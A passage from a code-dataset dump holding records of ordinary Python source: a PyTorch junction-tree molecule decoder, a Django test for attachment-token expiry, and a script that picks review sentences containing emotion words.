"azure.keyvault.administration.KeyVaultBackupClient", "line_number": 69, "usage_type": "call"}, {"api_name": "devtools_testutils.ResourceGroupPreparer", "line_number": 61, "usage_type": "call"}, {"api_name": "devtools_testutils.StorageAccountPreparer", "line_number": 62, "usage_type": "call"}, {"api_name": "blob_container_preparer.BlobContainerPreparer", "line_number": 63, "usage_type": "call"}, {"api_name": "azure.keyvault.keys.KeyClient", "line_number": 96, "usage_type": "call"}, {"api_name": "azure.keyvault.administration.KeyVaultBackupClient", "line_number": 101, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 110, "usage_type": "call"}, 
{"api_name": "azure.core.exceptions.ResourceExistsError", "line_number": 111, "usage_type": "argument"}, {"api_name": "devtools_testutils.ResourceGroupPreparer", "line_number": 91, "usage_type": "call"}, {"api_name": "devtools_testutils.StorageAccountPreparer", "line_number": 92, "usage_type": "call"}, {"api_name": "blob_container_preparer.BlobContainerPreparer", "line_number": 93, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 120, "usage_type": "call"}, {"api_name": "azure.keyvault.administration.KeyVaultBackupClient", "line_number": 123, "usage_type": "call"}, {"api_name": "devtools_testutils.ResourceGroupPreparer", "line_number": 115, "usage_type": "call"}, {"api_name": "devtools_testutils.StorageAccountPreparer", "line_number": 116, "usage_type": "call"}, {"api_name": "blob_container_preparer.BlobContainerPreparer", "line_number": 117, "usage_type": "call"}, {"api_name": "pytest.mark.usefixtures", "line_number": 24, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 24, "usage_type": "attribute"}, {"api_name": "azure.keyvault.administration._internal.parse_folder_url", "line_number": 179, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 165, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 165, "usage_type": "attribute"}]}
+{"seq_id": "522943386", "text": "# -*- coding:UTF-8 -*-\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom branch_jtnn.mol_tree import MolTree, MolTreeNode\nfrom util.nnutils import create_var, GRU\nfrom util.chemutils import enum_assemble, enum_can_assemble\nimport pickle\n\nimport os\n\n# TODO: zyj\n# MAX_NB = 15\nMAX_NB = 20\n# ===================\n\nMAX_DECODE_LEN = 100\nMAX_SOFT_DECODE_LEN = 60\n\nclass JTNNDecoder(nn.Module):\n\n def __init__(self, vocab, hidden_size, embedding, use_molatt):\n super(JTNNDecoder, self).__init__()\n self.hidden_size = hidden_size\n self.vocab_size = vocab.size()\n self.vocab = vocab\n self.embedding = embedding\n self.use_molatt = use_molatt\n\n #GRU Weights\n self.W_z = nn.Linear(2 * hidden_size, hidden_size)\n self.U_r = nn.Linear(hidden_size, hidden_size, bias=False)\n self.W_r = nn.Linear(hidden_size, hidden_size)\n self.W_h = nn.Linear(2 * hidden_size, hidden_size)\n\n #Word Prediction Weights (attention matrix no bias)\n self.W_t = nn.Linear(hidden_size, hidden_size, bias=False)\n self.history_W_t = nn.Linear(hidden_size, hidden_size, bias=False)\n if use_molatt:\n self.W = nn.Linear(5 * hidden_size, hidden_size)\n self.W_g = nn.Linear(hidden_size, hidden_size, bias=False)\n self.history_W_g = nn.Linear(hidden_size, hidden_size, bias=False)\n else:\n self.W = nn.Linear(3 * hidden_size, hidden_size)\n self.W_g = None\n self.history_W_g = None\n\n #Stop Prediction Weights (attention matrix no bias)\n self.U_i = nn.Linear(2 * hidden_size, hidden_size)\n self.U_t = nn.Linear(hidden_size, hidden_size, bias=False)\n self.history_U_t = nn.Linear(hidden_size, hidden_size, bias=False)\n if use_molatt:\n self.U = nn.Linear(5 * hidden_size, hidden_size)\n self.U_g = nn.Linear(hidden_size, hidden_size, bias=False)\n self.history_U_g = nn.Linear(hidden_size, hidden_size, bias=False)\n else:\n self.U = nn.Linear(3 * hidden_size, hidden_size)\n self.U_g = None\n self.history_U_g = None\n\n #Output Weights\n self.W_o = nn.Linear(hidden_size, self.vocab_size)\n self.U_o = nn.Linear(hidden_size, 1)\n\n #Loss Functions\n self.pred_loss = nn.CrossEntropyLoss(size_average=False)\n self.stop_loss = nn.BCEWithLogitsLoss(size_average=False)\n\n def attention(self, hiddens, contexts, x_tree_vecs, x_mol_vecs, y_history_tree_vecs, y_history_mol_vecs, mode):\n if mode == 'word':\n V, V_t, history_V_t, V_g, history_V_g, V_o = self.W, self.W_t, self.history_W_t, self.W_g, self.history_W_g, self.W_o\n elif mode == 'stop':\n V, V_t, history_V_t, V_g, history_V_g, V_o = self.U, self.U_t, self.history_U_t, self.U_g, self.history_U_g, self.U_o\n else:\n raise ValueError('attention mode is wrong')\n\n tree_vecs = x_tree_vecs.index_select(0, contexts)\n tree_att = torch.bmm( tree_vecs, V_t(hiddens).unsqueeze(-1) )\n tree_contexts = (F.softmax(tree_att, dim=1) * tree_vecs).sum(dim=1)\n\n history_tree_vecs = y_history_tree_vecs.index_select(0, contexts)\n history_tree_att = torch.bmm(history_tree_vecs, history_V_t(hiddens).unsqueeze(-1))\n history_tree_contexts = (F.softmax(history_tree_att, dim=1) * history_tree_vecs).sum(dim=1)\n\n if self.use_molatt:\n mol_vecs = x_mol_vecs.index_select(0, contexts)\n mol_att = torch.bmm( mol_vecs, V_g(hiddens).unsqueeze(-1) )\n mol_contexts = (F.softmax(mol_att, dim=1) * mol_vecs).sum(dim=1)\n\n history_mol_vecs = y_history_mol_vecs.index_select(0, contexts)\n history_mol_att = torch.bmm(history_mol_vecs, history_V_g(hiddens).unsqueeze(-1))\n history_mol_contexts = (F.softmax(history_mol_att, dim=1) * 
history_mol_vecs).sum(dim=1)\n\n input_vec = torch.cat([hiddens, tree_contexts, history_tree_contexts, mol_contexts, history_mol_contexts], dim=1)\n else:\n input_vec = torch.cat([hiddens, tree_contexts, history_tree_contexts], dim=1)\n\n output_vec = F.relu( V(input_vec) )\n return V_o(output_vec)\n\n def forward(self, mol_tree_batch, x_tree_vecs, x_mol_vecs, reserve_x_tree_vecs, reserve_x_mol_vecs):\n pred_hiddens, pred_contexts, pred_targets = [], [], []\n stop_hiddens, stop_contexts, stop_targets = [], [], []\n traces = []\n for mol_tree in mol_tree_batch:\n s = []\n dfs(s, mol_tree.nodes[0], -1)\n traces.append(s)\n for node in mol_tree.nodes:\n node.neighbors = []\n\n #Predict Root\n batch_size = len(mol_tree_batch)\n\n max_iter = max([len(tr) for tr in traces])\n padding = create_var(torch.zeros(self.hidden_size), False)\n h = {}\n\n for t in range(max_iter):\n\n prop_list = []\n batch_list = []\n for i, plist in enumerate(traces):\n if t < len(plist):\n prop_list.append(plist[t])\n batch_list.append(i)\n\n cur_x = []\n cur_h_nei, cur_o_nei = [], []\n\n for node_x, real_y, _ in prop_list:\n #Neighbors for message passing (target not included)\n cur_nei = [h[(node_y.idx, node_x.idx)] for node_y in node_x.neighbors if node_y.idx != real_y.idx]\n pad_len = MAX_NB - len(cur_nei)\n\n # TODO: zyj\n if pad_len < 0:\n cur_nei = cur_nei[:MAX_NB]\n # =========================\n\n cur_h_nei.extend(cur_nei)\n cur_h_nei.extend([padding] * pad_len)\n\n #Neighbors for stop prediction (all neighbors)\n cur_nei = [h[(node_y.idx,node_x.idx)] for node_y in node_x.neighbors]\n pad_len = MAX_NB - len(cur_nei)\n\n # TODO: zyj\n if pad_len < 0:\n cur_nei = cur_nei[:MAX_NB]\n # ==========================\n\n cur_o_nei.extend(cur_nei)\n cur_o_nei.extend([padding] * pad_len)\n\n #Current clique embedding\n cur_x.append(node_x.wid)\n\n #Clique embedding\n cur_x = create_var(torch.LongTensor(cur_x))\n cur_x = self.embedding(cur_x)\n\n #Message passing\n cur_h_nei = torch.stack(cur_h_nei, dim=0).view(-1, MAX_NB, self.hidden_size)\n new_h = GRU(cur_x, cur_h_nei, self.W_z, self.W_r, self.U_r, self.W_h)\n\n #Node Aggregate\n cur_o_nei = torch.stack(cur_o_nei, dim=0).view(-1,MAX_NB,self.hidden_size)\n cur_o = cur_o_nei.sum(dim=1)\n\n #Gather targets\n pred_target,pred_list = [],[]\n stop_target = []\n for i,m in enumerate(prop_list):\n node_x,node_y,direction = m\n x,y = node_x.idx,node_y.idx\n h[(x,y)] = new_h[i]\n node_y.neighbors.append(node_x)\n if direction == 1:\n pred_target.append(node_y.wid)\n pred_list.append(i) \n stop_target.append(direction)\n\n #Hidden states for stop prediction\n cur_batch = create_var(torch.LongTensor(batch_list))\n stop_hidden = torch.cat([cur_x,cur_o], dim=1)\n stop_hiddens.append( stop_hidden )\n stop_contexts.append( cur_batch )\n stop_targets.extend( stop_target )\n \n #Hidden states for clique prediction\n if len(pred_list) > 0:\n batch_list = [batch_list[i] for i in pred_list]\n cur_batch = create_var(torch.LongTensor(batch_list))\n pred_contexts.append( cur_batch )\n\n cur_pred = create_var(torch.LongTensor(pred_list))\n pred_hiddens.append( new_h.index_select(0, cur_pred) )\n pred_targets.extend( pred_target )\n\n #Last stop at root\n cur_x,cur_o_nei = [],[]\n for mol_tree in mol_tree_batch:\n node_x = mol_tree.nodes[0]\n cur_x.append(node_x.wid)\n cur_nei = [h[(node_y.idx,node_x.idx)] for node_y in node_x.neighbors]\n pad_len = MAX_NB - len(cur_nei)\n cur_o_nei.extend(cur_nei)\n cur_o_nei.extend([padding] * pad_len)\n\n cur_x = create_var(torch.LongTensor(cur_x))\n cur_x = 
self.embedding(cur_x)\n cur_o_nei = torch.stack(cur_o_nei, dim=0).view(-1,MAX_NB,self.hidden_size)\n cur_o = cur_o_nei.sum(dim=1)\n\n stop_hidden = torch.cat([cur_x,cur_o], dim=1)\n stop_hiddens.append( stop_hidden )\n stop_contexts.append( create_var( torch.LongTensor(list(range(batch_size))) ) )\n stop_targets.extend([0] * len(mol_tree_batch))\n\n #Predict next clique\n pred_contexts = torch.cat(pred_contexts, dim=0)\n pred_hiddens = torch.cat(pred_hiddens, dim=0)\n pred_scores = self.attention(pred_hiddens, pred_contexts, x_tree_vecs, x_mol_vecs, reserve_x_tree_vecs, reserve_x_mol_vecs, 'word')\n pred_targets = create_var(torch.LongTensor(pred_targets))\n\n pred_loss = self.pred_loss(pred_scores, pred_targets) / len(mol_tree_batch)\n _,preds = torch.max(pred_scores, dim=1)\n pred_acc = torch.eq(preds, pred_targets).float()\n pred_acc = torch.sum(pred_acc) / pred_targets.nelement()\n\n #Predict stop\n stop_contexts = torch.cat(stop_contexts, dim=0)\n stop_hiddens = torch.cat(stop_hiddens, dim=0)\n stop_hiddens = F.relu( self.U_i(stop_hiddens) )\n stop_scores = self.attention(stop_hiddens, stop_contexts, x_tree_vecs, x_mol_vecs, reserve_x_tree_vecs, reserve_x_mol_vecs, 'stop')\n stop_scores = stop_scores.squeeze(-1)\n stop_targets = create_var(torch.Tensor(stop_targets))\n \n stop_loss = self.stop_loss(stop_scores, stop_targets) / len(mol_tree_batch)\n stops = torch.ge(stop_scores, 0).float()\n stop_acc = torch.eq(stops, stop_targets).float()\n stop_acc = torch.sum(stop_acc) / stop_targets.nelement()\n\n return pred_loss, stop_loss, pred_acc.item(), stop_acc.item()\n\n def decode(self, x_tree_vecs, x_mol_vecs, reserve_x_tree_vecs, reserve_x_mol_vecs, root_wid,\n extra_neighbor_atom_symbols, extra_neighbor_bonds):\n assert x_tree_vecs.size(0) == 1\n\n stack = []\n zero_pad = create_var(torch.zeros(1,1,self.hidden_size))\n contexts = create_var( torch.LongTensor(1).zero_() )\n\n #Root (The same as the predict center, need not predict)\n root = MolTreeNode(self.vocab.get_smiles(root_wid))\n root.wid = root_wid\n root.idx = 0\n stack.append( (root, self.vocab.get_slots(root.wid)) )\n\n all_nodes = [root]\n h = {}\n for step in range(MAX_DECODE_LEN):\n\n node_x,fa_slot = stack[-1]\n cur_h_nei = [ h[(node_y.idx,node_x.idx)] for node_y in node_x.neighbors ]\n if len(cur_h_nei) > 0:\n cur_h_nei = torch.stack(cur_h_nei, dim=0).view(1,-1,self.hidden_size)\n else:\n cur_h_nei = zero_pad\n\n cur_x = create_var(torch.LongTensor([node_x.wid]))\n cur_x = self.embedding(cur_x)\n\n #Predict stop\n cur_h = cur_h_nei.sum(dim=1)\n stop_hiddens = torch.cat([cur_x,cur_h], dim=1)\n stop_hiddens = F.relu( self.U_i(stop_hiddens) )\n stop_score = self.attention(stop_hiddens, contexts, x_tree_vecs, x_mol_vecs,\n reserve_x_tree_vecs, reserve_x_mol_vecs, 'stop')\n \n backtrack = (stop_score.item() < 0) \n\n if not backtrack: #Forward: Predict next clique\n\n new_h = GRU(cur_x, cur_h_nei, self.W_z, self.W_r, self.U_r, self.W_h)\n pred_score = self.attention(new_h, contexts, x_tree_vecs, x_mol_vecs,\n reserve_x_tree_vecs, reserve_x_mol_vecs, 'word')\n\n _,sort_wid = torch.sort(pred_score, dim=1, descending=True)\n sort_wid = sort_wid.data.squeeze()\n\n next_wid = None\n for wid in sort_wid[:5]:\n slots = self.vocab.get_slots(wid)\n node_y = MolTreeNode(self.vocab.get_smiles(wid))\n\n extra_symbols = []\n extra_bonds = []\n if node_x.idx == 0:\n extra_symbols = extra_neighbor_atom_symbols\n extra_bonds = extra_neighbor_bonds\n\n if have_slots(fa_slot, slots) and \\\n can_assemble(node_x, node_y,\n 
extra_neighbor_atom_symbols=extra_symbols,\n extra_neighbor_bonds=extra_bonds):\n next_wid = wid\n next_slots = slots\n break\n\n if next_wid is None:\n backtrack = True #No more children can be added\n else:\n node_y = MolTreeNode(self.vocab.get_smiles(next_wid))\n node_y.wid = next_wid\n node_y.idx = len(all_nodes)\n node_y.neighbors.append(node_x)\n h[(node_x.idx,node_y.idx)] = new_h[0]\n stack.append( (node_y,next_slots) )\n all_nodes.append(node_y)\n\n if backtrack: #Backtrack, use if instead of else\n\n if len(stack) == 1: \n break #At root, terminate\n\n node_fa,_ = stack[-2]\n cur_h_nei = [ h[(node_y.idx,node_x.idx)] for node_y in node_x.neighbors if node_y.idx != node_fa.idx ]\n if len(cur_h_nei) > 0:\n cur_h_nei = torch.stack(cur_h_nei, dim=0).view(1,-1,self.hidden_size)\n else:\n cur_h_nei = zero_pad\n\n new_h = GRU(cur_x, cur_h_nei, self.W_z, self.W_r, self.U_r, self.W_h)\n h[(node_x.idx,node_fa.idx)] = new_h[0]\n node_fa.neighbors.append(node_x)\n stack.pop()\n\n return root, all_nodes\n \n\"\"\"\nHelper Functions:\n\"\"\"\n\ndef dfs(stack, x, fa_idx):\n for y in x.neighbors:\n if y.idx == fa_idx: continue # skip the parent node: do not add this edge\n stack.append( (x,y,1) ) # 1 marks the forward direction (root to child)\n dfs(stack, y, x.idx)\n stack.append( (y,x,0) ) # 0 marks the backward direction (child to root)\n\ndef sorted_dfs(x_stack, x, fa_idx):\n tot = 0\n all_stacks = []\n for y in x.neighbors:\n if y.idx == fa_idx: continue\n y_stack = [(x,y,1)]\n dfs(y_stack, y, x.idx)\n y_stack.append( (y,x,0) )\n all_stacks.append(y_stack)\n\n all_stacks = sorted(all_stacks, key=lambda x:len(x))\n for stk in all_stacks:\n x_stack.extend(stk)\n\ndef have_slots(fa_slots, ch_slots):\n\n if len(fa_slots) > 2 and len(ch_slots) > 2:\n return True\n matches = []\n for i,s1 in enumerate(fa_slots):\n a1,c1,h1 = s1\n for j,s2 in enumerate(ch_slots):\n a2,c2,h2 = s2\n if a1 == a2 and c1 == c2 and (a1 != \"C\" or h1 + h2 >= 4):\n matches.append( (i,j) )\n\n if len(matches) == 0: return False\n\n fa_match,ch_match = list(zip(*matches))\n if len(set(fa_match)) == 1 and 1 < len(fa_slots) <= 2: #never remove atom from ring\n fa_slots.pop(fa_match[0])\n if len(set(ch_match)) == 1 and 1 < len(ch_slots) <= 2: #never remove atom from ring\n ch_slots.pop(ch_match[0])\n\n return True\n \ndef can_assemble(node_x, node_y, extra_neighbor_atom_symbols=[], extra_neighbor_bonds=[]):\n\n neis = node_x.neighbors + [node_y]\n for i,nei in enumerate(neis):\n nei.nid = i\n\n neighbors = [nei for nei in neis if nei.mol.GetNumAtoms() > 1]\n\n neighbors = sorted(neighbors, key=lambda x:x.mol.GetNumAtoms(), reverse=True)\n singletons = [nei for nei in neis if nei.mol.GetNumAtoms() == 1]\n\n neighbors = singletons + neighbors\n\n cands = enum_can_assemble(node_x, neighbors,\n extra_neighbor_atom_symbols=extra_neighbor_atom_symbols,\n extra_neighbor_bonds=extra_neighbor_bonds)\n\n return len(cands) > 0\n\n\nif __name__ == \"__main__\":\n smiles = [\"O=C1[C@@H]2C=C[C@@H](C=CC2)C1(c1ccccc1)c1ccccc1\", \"O=C([O-])CC[C@@]12CCCC[C@]1(O)OC(=O)CC2\", \"ON=C1C[C@H]2CC3(C[C@@H](C1)c1ccccc12)OCCO3\", \"C[C@H]1CC(=O)[C@H]2[C@@]3(O)C(=O)c4cccc(O)c4[C@@H]4O[C@@]43[C@@H](O)C[C@]2(O)C1\", 'Cc1cc(NC(=O)CSc2nnc3c4ccccc4n(C)c3n2)ccc1Br', 'CC(C)(C)c1ccc(C(=O)N[C@H]2CCN3CCCc4cccc2c43)cc1', \"O=c1c2ccc3c(=O)n(-c4nccs4)c(=O)c4ccc(c(=O)n1-c1nccs1)c2c34\", \"O=C(N1CCc2c(F)ccc(F)c2C1)C1(O)Cc2ccccc2C1\"]\n for s in smiles:\n print(s)\n tree = MolTree(s)\n for i,node in enumerate(tree.nodes):\n node.idx = i\n\n stack = []\n dfs(stack, tree.nodes[0], -1)\n for x,y,d in stack:\n print(x.smiles, y.smiles, d)\n 
print('------------------------------')\n", "sub_path": "branch_jtnn/jtnn_dec.py", "file_name": "jtnn_dec.py", "file_ext": "py", "file_size_in_byte": 17170, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "torch.nn.Module", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.BCEWithLogitsLoss", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.bmm", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 79, "usage_type": "call"}, 
{"api_name": "torch.nn.functional", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.bmm", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.bmm", "line_number": 87, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.bmm", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 98, "usage_type": "name"}, {"api_name": "util.nnutils.create_var", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 116, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 164, "usage_type": "call"}, {"api_name": "util.nnutils.GRU", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 168, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 186, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 194, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 197, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 211, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 211, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 216, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 218, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 218, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 222, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 223, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.eq", "line_number": 229, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 233, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 235, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 235, "usage_type": "name"}, {"api_name": "util.nnutils.create_var", "line_number": 238, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 238, 
"usage_type": "call"}, {"api_name": "torch.ge", "line_number": 241, "usage_type": "call"}, {"api_name": "torch.eq", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 243, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 252, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 252, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 253, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 253, "usage_type": "call"}, {"api_name": "branch_jtnn.mol_tree.MolTreeNode", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 268, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 272, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 272, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 278, "usage_type": "name"}, {"api_name": "util.nnutils.GRU", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.sort", "line_number": 290, "usage_type": "call"}, {"api_name": "branch_jtnn.mol_tree.MolTreeNode", "line_number": 296, "usage_type": "call"}, {"api_name": "branch_jtnn.mol_tree.MolTreeNode", "line_number": 315, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 331, "usage_type": "call"}, {"api_name": "util.nnutils.GRU", "line_number": 335, "usage_type": "call"}, {"api_name": "util.chemutils.enum_can_assemble", "line_number": 402, "usage_type": "call"}, {"api_name": "branch_jtnn.mol_tree.MolTree", "line_number": 413, "usage_type": "call"}]}
+{"seq_id": "107427428", "text": "from freezegun import freeze_time\nfrom rest_framework import test\nfrom rest_framework.exceptions import ValidationError\n\nfrom waldur_core.core.tests.helpers import override_waldur_core_settings\nfrom waldur_core.media.utils import decode_attachment_token, encode_attachment_token\nfrom waldur_core.structure.tests.factories import CustomerFactory, UserFactory\n\n\n@override_waldur_core_settings(TIME_ZONE='Asia/Muscat')\nclass TestMediaUtils(test.APITransactionTestCase):\n def setUp(self):\n self.user = UserFactory()\n self.customer = CustomerFactory()\n\n def test_token_encoder(self):\n token = encode_attachment_token(self.user.uuid.hex, self.customer, 'image')\n user_uuid, content_type, object_id, field = decode_attachment_token(token)\n self.assertEqual(self.user.uuid.hex, user_uuid)\n self.assertEqual(field, 'image')\n self.assertEqual(object_id, self.customer.uuid.hex)\n\n def test_expired_token(self):\n with freeze_time('2019-01-01'):\n token = encode_attachment_token(self.user.uuid.hex, self.customer, 'image')\n with freeze_time('2019-01-02'):\n self.assertRaises(ValidationError, decode_attachment_token, token)\n", "sub_path": "src/waldur_core/media/tests/test_utils.py", "file_name": "test_utils.py", "file_ext": "py", "file_size_in_byte": 1205, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "rest_framework.test.APITransactionTestCase", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.test", "line_number": 11, "usage_type": "name"}, {"api_name": "waldur_core.structure.tests.factories.UserFactory", "line_number": 13, "usage_type": "call"}, {"api_name": "waldur_core.structure.tests.factories.CustomerFactory", "line_number": 14, "usage_type": "call"}, {"api_name": "waldur_core.media.utils.encode_attachment_token", "line_number": 17, "usage_type": "call"}, {"api_name": "waldur_core.media.utils.decode_attachment_token", "line_number": 18, "usage_type": "call"}, {"api_name": "freezegun.freeze_time", "line_number": 24, "usage_type": "call"}, {"api_name": "waldur_core.media.utils.encode_attachment_token", "line_number": 25, "usage_type": "call"}, {"api_name": "freezegun.freeze_time", "line_number": 26, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 27, "usage_type": "argument"}, {"api_name": "waldur_core.media.utils.decode_attachment_token", "line_number": 27, "usage_type": "argument"}, {"api_name": "waldur_core.core.tests.helpers.override_waldur_core_settings", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "35032093", "text": "import os, re\nimport pandas as pd\nfrom config import config\nfrom nltk import sent_tokenize\n\nfilePath = \".\" + os.sep + config[\"website\"] + os.sep + config[\"product\"] + \"_EMOTION\" + \".csv\"\ndf = pd.read_csv(filePath)\n\ndef selectSentenceWithEmotion(sentences, emotions):\n \"\"\"\n # Arguments\n sentences: string list, each element is a sentence.\n emotions: string list, each element is an emotion word.\n # Returns\n _sentences: string list, each element is a sentence that contains at least one emotion word\n \"\"\"\n emotionsre = re.compile(\"|\".join(emotions))\n _sentences = []\n for sentence in sentences:\n if re.search(emotionsre, sentence):\n _sentences.append(sentence)\n return _sentences\n \nselected = []\nfor _, row in df.iterrows():\n sentences = sent_tokenize(row[\"title_body\"])\n emotions = row[\"extracted\"].split()\n selected.append(\" \".join(selectSentenceWithEmotion(sentences, emotions)))\ndf[\"selected\"] = selected\n\n# Rearrange column order\ndf = df[[\"title_body\", \"extracted\", \"selected\", \"key\"]]\n\n# Write to csv\noutputPath = \".\" + os.sep + config[\"website\"] + os.sep + config[\"product\"] + \"_EMOTION.csv\"\ndf.to_csv(outputPath, encoding='utf-8', index=False)\n\n", "sub_path": "sentidiff.py", "file_name": "sentidiff.py", "file_ext": "py", "file_size_in_byte": 1227, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.sep", "line_number": 6, "usage_type": "attribute"}, {"api_name": "config.config", "line_number": 6, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 7, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 17, "usage_type": "call"}, {"api_name": "re.search", "line_number": 20, "usage_type": "call"}, {"api_name": "nltk.sent_tokenize", "line_number": 26, "usage_type": "call"}, {"api_name": "os.sep", 